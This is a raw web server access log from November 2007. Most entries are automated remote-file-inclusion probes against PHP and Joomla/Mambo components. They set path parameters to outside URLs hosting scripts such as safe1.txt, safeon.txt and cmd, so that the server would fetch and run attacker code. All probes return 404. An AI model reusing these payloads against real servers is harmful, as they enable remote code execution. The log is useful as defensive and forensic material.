198.66.208.57 - - [11/Nov/2007:18:28:25 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tokyowww.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
198.66.208.57 - - [11/Nov/2007:18:28:25 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tokyowww.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
68.44.185.53 - - [11/Nov/2007:18:28:41 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
68.44.185.53 - - [11/Nov/2007:18:28:41 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.44.185.53 - - [11/Nov/2007:18:28:41 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.55.132.33 - - [11/Nov/2007:18:29:41 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.55.132.33 - - [11/Nov/2007:18:29:41 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:18:29:51 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:18:29:51 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:18:29:52 -0800] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.228.216.189 - - [11/Nov/2007:18:30:18 -0800] "PUT /scanned HTTP/1.0" 403 163 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:31:15 -0800] "GET /logs/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:31:16 -0800] "GET /index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:18:31:16 -0800] "GET /logs/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.240.236.3 - - [11/Nov/2007:18:31:16 -0800] "GET /index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.67.202.81 - - [11/Nov/2007:18:31:32 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68"
212.67.202.81 - - [11/Nov/2007:18:31:32 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68"
85.25.148.183 - - [11/Nov/2007:18:32:14 -0800] "GET /logs/access_070924.log/oneadmin/calendar/include.php?path[docroot]=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:18:32:15 -0800] "GET /oneadmin/calendar/include.php?path[docroot]=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:18:32:15 -0800] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.113.188.18 - - [11/Nov/2007:18:32:22 -0800] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://e-smkk.net/forum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.188.18 - - [11/Nov/2007:18:32:22 -0800] "GET /oneadmin/calendar/include.php?path[docroot]=http://e-smkk.net/forum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.188.18 - - [11/Nov/2007:18:32:22 -0800] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://e-smkk.net/forum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
208.113.188.18 - - [11/Nov/2007:18:32:22 -0800] "GET /oneadmin/calendar/include.php?path[docroot]=http://e-smkk.net/forum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
168.100.192.66 - - [11/Nov/2007:18:33:12 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.180.250.72 - - [11/Nov/2007:18:33:39 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.29.74.145 - - [11/Nov/2007:18:37:05 -0800] "GET /logs/access_070611.log//modules/My_eGallery/public/displayCategory.php?basepath=http://64.92.163.162/~myspaceg/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.145 - - [11/Nov/2007:18:37:05 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://64.92.163.162/~myspaceg/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.74.145 - - [11/Nov/2007:18:37:05 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://64.92.163.162/~myspaceg/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
168.100.192.66 - - [11/Nov/2007:18:37:12 -0800] "GET /logs/index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:37:12 -0800] "GET /index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:38:35 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:38:36 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:38:37 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
168.100.192.66 - - [11/Nov/2007:18:38:41 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
168.100.192.66 - - [11/Nov/2007:18:39:44 -0800] "GET /logs/index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
168.100.192.66 - - [11/Nov/2007:18:39:44 -0800] "GET /index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
64.26.145.91 - - [11/Nov/2007:18:40:03 -0800] "GET /logs/send_reminders.php?includedir=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:18:40:03 -0800] "GET /send_reminders.php?includedir=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
198.66.208.57 - - [11/Nov/2007:18:40:07 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tokyowww.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
198.66.208.57 - - [11/Nov/2007:18:40:07 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tokyowww.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:18:40:15 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
221.219.217.152 - - [11/Nov/2007:18:40:15 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
86.109.161.198 - - [11/Nov/2007:18:40:16 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:18:40:16 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
221.219.217.152 - - [11/Nov/2007:18:40:31 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
74.6.19.74 - - [11/Nov/2007:18:40:57 -0800] "GET /logs/access_070521.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
206.132.195.117 - - [11/Nov/2007:18:41:12 -0800] "GET /logs/mail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.132.195.117 - - [11/Nov/2007:18:41:12 -0800] "GET /mail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:18:41:42 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:18:41:42 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:18:41:42 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:18:42:28 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:18:42:51 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:18:42:51 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:18:42:52 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:18:42:58 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:18:42:58 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.towaterfront.ca/surveys/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
222.253.113.118 - - [11/Nov/2007:18:43:04 -0800] "GET /logs/scripts.log HTTP/1.1" 200 462383 "http://www.google.com.vn/search?q=uid%3D99(nobody)&hl=vi&start=20&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.194.124.84 - - [11/Nov/2007:18:43:26 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:18:44:11 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:18:44:12 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:18:44:13 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:44:42 -0800] "GET /logs/index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:44:43 -0800] "GET /index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:18:45:24 -0800] "GET /logs/!scanhttp://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:18:45:25 -0800] "GET /!scanhttp://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.214.236 - - [11/Nov/2007:18:47:21 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.180.250.115 - - [11/Nov/2007:18:48:15 -0800] "GET /logs/access.log HTTP/1.0" 200 113952 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:18:48:55 -0800] "GET /logs/index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:18:48:55 -0800] "GET /index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:18:48:56 -0800] "GET /logs/index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.46.26.132 - - [11/Nov/2007:18:48:56 -0800] "GET /index1.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.55.132.33 - - [11/Nov/2007:18:50:07 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.55.132.33 - - [11/Nov/2007:18:50:07 -0800] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:18:53:02 -0800] "GET /logs/index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:18:53:03 -0800] "GET /index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:18:53:46 -0800] "GET /logs/index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.46.26.132 - - [11/Nov/2007:18:53:46 -0800] "GET /index2.php?x=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.30.226.134 - - [11/Nov/2007:18:54:18 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.210.236.16 - - [11/Nov/2007:18:56:41 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
209.210.236.16 - - [11/Nov/2007:18:56:41 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:57:27 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:57:27 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.67.20.99 - - [11/Nov/2007:18:58:17 -0800] "GET /logs/access_070716.log///////////////com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://71.41.190.203/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801"
168.100.192.66 - - [11/Nov/2007:18:59:34 -0800] "GET /logs/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:59:34 -0800] "GET /index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:18:59:36 -0800] "GET /logs/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
168.100.192.66 - - [11/Nov/2007:18:59:36 -0800] "GET /index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
89.159.201.192 - - [11/Nov/2007:19:00:20 -0800] "GET /logs/access.log HTTP/1.0" 200 117909 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:19:00:27 -0800] "GET /logs/access_071008.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:19:00:27 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.67.20.99 - - [11/Nov/2007:19:00:38 -0800] "GET /logs/access_070820.log///////////////com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://71.41.190.203/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801"
168.100.192.66 - - [11/Nov/2007:19:00:49 -0800] "GET /logs/access_070806.log/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
168.100.192.66 - - [11/Nov/2007:19:00:52 -0800] "GET /logs/access_070723.log/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:01:59 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:01:59 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:02:46 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
86.109.161.198 - - [11/Nov/2007:19:02:46 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:02:46 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:02:47 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:02:47 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:02:48 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:03:49 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:03:49 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:03:50 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:03:50 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:03:50 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.161.198 - - [11/Nov/2007:19:03:50 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
221.219.217.152 - - [11/Nov/2007:19:04:22 -0800] "GET /newspublish/include.php?path[docroot]=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:06:49 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:06:50 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
69.50.211.121 - - [11/Nov/2007:19:06:50 -0800] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://www.eyeconect.com/counter/database/includes/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.50.211.121 - - [11/Nov/2007:19:06:51 -0800] "GET /oneadmin/calendar/include.php?path[docroot]=http://www.eyeconect.com/counter/database/includes/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:06:51 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:07:18 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:07:19 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:07:20 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:08:04 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:08:04 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.194.124.84 - - [11/Nov/2007:19:08:05 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
